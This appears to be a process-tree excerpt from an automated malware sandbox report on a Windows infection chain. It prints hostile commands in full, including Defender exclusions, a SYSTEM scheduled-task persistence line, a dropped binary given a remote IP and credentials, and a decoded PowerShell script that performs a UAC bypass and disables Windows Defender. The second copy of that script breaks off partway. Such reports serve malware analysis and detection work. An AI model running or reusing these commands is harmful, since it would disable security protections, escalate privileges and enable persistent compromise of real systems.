C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe"C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe" ""5⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:14244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
-
C:\Users\Admin\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe"C:\Users\Admin\AppData\Local\Temp\\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe" "{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}"5⤵
- Executes dropped EXE
PID:640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10191470101\st22BJg.exe"C:\Users\Admin\AppData\Local\Temp\10191470101\st22BJg.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:7216 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"4⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Checks computer location settings
PID:7452 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\92A0BDBD97C6286F27ECE03216F368F8\9721E0C71B553D2AEC3C4FE5D645C368.vbe" /f /rl highest5⤵
- Scheduled Task/Job: Scheduled Task
PID:9612
-
-
C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif"C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf95⤵
- Executes dropped EXE
PID:6476 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CC5710DEACFCE0001:00000000000000000000000000000000000000000000001CC571118E22623FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"6⤵PID:6576
-
C:\Users\Admin\AppData\Local\Temp\OpenCL.pifOpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CC5710DEACFCE0001:00000000000000000000000000000000000000000000001CC571118E22623FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG7⤵
- Executes dropped EXE
PID:6768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CC5710DEACFCE0001:00000000000000000000000000000000000000000000001CC571118E22623FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"6⤵PID:7544
-
C:\Users\Admin\AppData\Local\Temp\OpenCL.pifOpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CC5710DEACFCE0001:00000000000000000000000000000000000000000000001CC571118E22623FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG7⤵
- Executes dropped EXE
PID:7568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7580
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:7548 -
C:\Users\Admin\AppData\Local\Temp\ShortcutTaskAgent.exe"C:\Users\Admin\AppData\Local\Temp\ShortcutTaskAgent.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Users\Admin\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeC:\Users\Admin\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:8596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:6008 -
C:\Users\Admin\AppData\Local\Temp\pluginfast_Yj.exeC:\Users\Admin\AppData\Local\Temp\pluginfast_Yj.exe8⤵
- Loads dropped DLL
PID:5372
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10199510101\9CQknW9.exe"C:\Users\Admin\AppData\Local\Temp\10199510101\9CQknW9.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9004 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9004 -s 2284⤵
- Program crash
PID:3904
-
-
-
C:\Users\Admin\AppData\Local\Temp\10200020101\7BzCs1a.exe"C:\Users\Admin\AppData\Local\Temp\10200020101\7BzCs1a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6328 -
C:\Users\Admin\AppData\Local\Temp\10200020101\7BzCs1a.exe"C:\Users\Admin\AppData\Local\Temp\10200020101\7BzCs1a.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:10920
-
-
-
C:\Users\Admin\AppData\Local\Temp\10200860101\Go7yA2t.exe"C:\Users\Admin\AppData\Local\Temp\10200860101\Go7yA2t.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:6936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:14048
-
-
C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\h2wb5_002.exe"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\h2wb5_002.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:7472 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵PID:8060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5484
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"5⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:7992 -
C:\ProgramData\{5A4A035D-A4F9-454A-85ED-D5727334CF26}\dbs.exe"C:\ProgramData\{5A4A035D-A4F9-454A-85ED-D5727334CF26}\dbs.exe" ""6⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\7⤵
- Suspicious use of AdjustPrivilegeToken
PID:5548
-
-
-
C:\Users\Admin\AppData\Local\Temp\{6A4A035D-A4F9-454A-85ED-D5727334CF36}\dbs.exe"C:\Users\Admin\AppData\Local\Temp\\{6A4A035D-A4F9-454A-85ED-D5727334CF36}\dbs.exe" "{5A4A035D-A4F9-454A-85ED-D5727334CF26}"6⤵
- Executes dropped EXE
PID:5928
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10200950101\OwPn5E9.exe"C:\Users\Admin\AppData\Local\Temp\10200950101\OwPn5E9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:8612
-
-
C:\Users\Admin\AppData\Local\Temp\10201910101\gtjFHJI.exe"C:\Users\Admin\AppData\Local\Temp\10201910101\gtjFHJI.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:13288 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:14008
-
-
-
C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:12460 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6844 -
C:\Users\Admin\AppData\Roaming\tZWlsuCjis.exe"C:\Users\Admin\AppData\Roaming\tZWlsuCjis.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:7476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 6⤵PID:5596
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend7⤵
- Launches sc.exe
PID:11648
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"7⤵PID:12344
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups7⤵PID:2068
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller7⤵PID:9452
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
